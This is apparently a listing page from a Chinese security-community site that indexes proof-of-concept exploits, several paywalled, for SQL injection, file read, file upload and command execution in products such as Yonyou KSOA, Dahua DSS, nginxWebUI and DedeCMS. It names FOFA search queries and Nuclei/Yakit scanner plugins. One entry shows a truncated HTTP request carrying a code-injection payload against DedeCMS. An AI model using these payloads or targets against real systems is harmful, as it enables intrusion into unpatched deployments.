秃兔安全_最新发布

友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞

秃兔11个月前

010014

【通用】大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞

fofa语句yakit插件 uuidpocyakit && nuclei yaml已验证

付费阅读500 Nuclei插件 POC Yakit插件 # poc # yakit # nuclei

dreamer29211个月前

010014

【通用】杜特网上订单系统getUserImage SQL注入漏洞

fofa 语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 Nuclei插件 POC Yakit插件 # poc # yakit # nuclei

dreamer29211个月前

010010

WX公众平台-无限回调系统 -SQL注入

POC 2024你懂的

秃兔11个月前

01005

APP分发签名系统index-uplog.php存在任意文件上传漏洞

POC 2024你懂的

秃兔11个月前

0998

用友时空KSOA系统接口五处存在SQL注入漏洞

用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞用友时空KSOA系统接口PrintZPZP.jsp存...

POC 2024你懂的

秃兔11个月前

09912

用友-畅捷通CRM-任意文件上传

POC 2024你懂的

秃兔11个月前

0995

【通用】 nginxWebUI getAuth 命令执行

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 Nuclei插件 POC Yakit插件 # poc # yakit # nuclei

dreamer29211个月前

0989

【通用】勤云科技期刊采编CMS存在SQL注入漏洞

fofa语句yakit插件uuidpocyakit && nuclei yaml已验证

付费阅读500 Nuclei插件 POC poc_yaml # poc # yakit # nuclei

dreamer29211个月前

0979

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...

POC 2024你懂的

秃兔11个月前

09715

上一页 1…33 343536 37…71 下一页跳转

攻防演练 & 红蓝对抗 & 其他文库